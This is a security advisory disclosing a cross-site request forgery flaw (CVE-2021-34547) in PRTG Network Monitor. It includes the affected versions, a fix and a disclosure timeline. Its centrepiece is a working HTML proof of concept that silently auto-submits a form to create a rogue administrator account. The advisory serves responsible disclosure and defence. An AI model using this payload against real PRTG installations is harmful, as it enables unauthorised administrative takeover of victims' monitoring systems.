#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  PRTG Network Monitor [1]
# Vendor:   Paessler AG
# CSNC ID:  CSNC-2022-008
# CVE ID:   CVE-2021-34547
# Subject:  Cross-Site Request Forgery (CSRF)
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Emanuele Barbeno (advisories@compass-security.com)
# Date:     09.06.2022
#
#############################################################

Introduction:
-------------

PRTG Network Monitor is an agentless network monitoring software from 
Paessler AG. It can monitor and classify system conditions like bandwidth 
usage or uptime and collect statistics from miscellaneous hosts as switches, 
routers, servers and other devices and applications.[2]

Requests sent to the server that trigger actions do not contain a CSRF token 
and can therefore be entirely predicted allowing attackers to cause the victim's 
browser to execute undesired actions in the web application through crafted 
requests. [3]


Affected:
---------
Vulnerable:
	* 21.1.66.1623

Not Vulnerable:
	* 22.1.74.1869
	

Technical Description
---------------------

Requests do not include Anti-CSRF tokens. Therefore, an attacker can guess
entire requests. Abusing this via prepared links/forms allows them to make
logged-in users execute actions unintendedly in the application.

For instance, the following Proof of Concept code can be used to create a 
new PRTG_Admin user with administrative privileges sending a POST request 
using the victim's session cookie:
```
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://<DOMAIN>/editsettings" method="POST" name="myForm" 
		id="myForm" enctype="multipart/form-data">
      <input type="hidden" name="login&#95;" value="CSRF&#95;Admin" />
      <input type="hidden" name="name&#95;" value="CSRF&#95;Admin" />
      <input type="hidden" name="email&#95;" 
		value="CSRF&#95;Admin&#64;CSRF&#95;Admin&#46;com" />
      <input type="hidden" name="email" value="" />
      <input type="hidden" name="passwordradio" value="1" />
      <input type="hidden" name="password1" value="Password123&#33;" />
      <input type="hidden" name="password&#95;" value="" />
      <input type="hidden" name="password2" value="Password123&#33;" />
      <input type="hidden" name="passhash" value="" />
      <input type="hidden" name="lastackedsensordeprecationgrowl" value="" />
      <input type="hidden" name="usertype&#95;" value="0" />
      <input type="hidden" name="allowack&#95;" value="0" />
      <input type="hidden" name="allowpwchange&#95;" value="0" />
      <input type="hidden" name="primarygroup&#95;" 
		value="200&#124;PRTG&#32;Administrators&#124;&#124;&#124;1&#124;" />
      <input type="hidden" name="primarygroup" value="201" />
      <input type="hidden" name="active&#95;" value="1" />
      <input type="hidden" name="autorefreshtype&#95;" value="1" />
      <input type="hidden" name="autorefreshinterval&#95;" value="30" />
      <input type="hidden" name="playsound&#95;" value="0" />
      <input type="hidden" name="homepage&#95;" value="" />
      <input type="hidden" name="timezone&#95;" 
		value="Pacific&#32;Standard&#32;Time&#124;&#40;UTC&#45;08&#58;00&#41;
				&#32;Pacific&#32;Time&#32;&#40;US&#32;&amp;&#32;Canada&#41;" />
      <input type="hidden" name="dateformat&#95;" value="0" />
      <input type="hidden" name="theme&#95;" value="0" />
      <input type="hidden" name="ticketmail&#95;" value="1" />
      <input type="hidden" name="objecttype" value="user" />
      <input type="hidden" name="id" value="new" />
      <input type="hidden" name="targeturl" 
		value="&#47;systemsetup&#46;htm&#63;tabid&#61;5" />
      <input type="submit" value="Submit request" />
    </form>

    <script type="text/javascript">
    window.onload=function(){
        var auto = setTimeout(function(){ submitform(); }, 100);

        function submitform(){
          document.forms["myForm"].submit();
        }
    }
</script>
  </body>
</html>
```

Since the session cookie doesn't have the Same-Site flag set, CSRF attacks 
with POST HTTP method work on all browsers except Chrome because it 
automatically sets the SameSite flag by default to lax. 


Workaround / Fix:
-----------------
Use CSRF tokens to prevent CSRF attacks.


Timeline:
---------
2021-03-12:     Discovery by Emanuele Barbeno
2021-03-12:     Initial vendor notification
2021-09-06:     Initial vendor response
2021-09-06:     Assigned CVE-2021-34547
2022-06-09:     Public disclosure


References:
-----------
[1] https://www.paessler.com/prtg
[2] https://en.wikipedia.org/wiki/PRTG_Network_Monitor
[3] https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html